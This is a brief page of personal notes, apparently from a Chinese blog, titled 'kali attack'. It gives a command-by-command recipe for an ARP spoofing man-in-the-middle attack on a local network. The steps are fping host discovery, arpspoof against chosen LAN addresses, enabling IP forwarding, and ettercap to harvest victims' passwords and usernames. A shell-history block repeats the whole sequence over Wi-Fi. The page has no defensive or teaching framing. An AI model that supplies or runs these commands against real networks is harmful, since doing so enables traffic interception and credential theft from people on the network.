kali attack(2016-09-02)

arp attack

  • synopsis

arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
arpspoof -i eth0 -t 192.168.0.102 192.168.0.1 //arp attack
fping -asg 192.198.0.1/24 //inquire the ip addr on lan( local are network)
fping -g 192.168.0.1/24
echo 1 > /proc/sys/net/ipv4/ip_forward//ip data packets redirect


ettercap

  • synopsis: If IPv6 is enabled:
    TARGET is in the form MAC/IPs/IPv6/PORTs
    Otherwise,
    TARGET is in the form MAC/IPs/PORTs
    where IPs and PORTs can be ranges (e.g. /192.168.0.1-30,40,50/20,22,25)

ettercap -Tq -i eth0 //when arp attack succeeds, we can use ettercap to acquire the datas of the host ,such as password ,ip ,username etc.

---

ifconfig
fping -g 192.168.0.1/24
arpspoof -i wlan0 -t 192.168.0.101 192.168.0.103
cd /proc/sys/net/ipv4
cat ip_forward
138 echo 1 > ip_forward
139 cat ip_forward
ettercap -Tq -i wlan0

你可能感兴趣的:(kali attack(2016-09-02))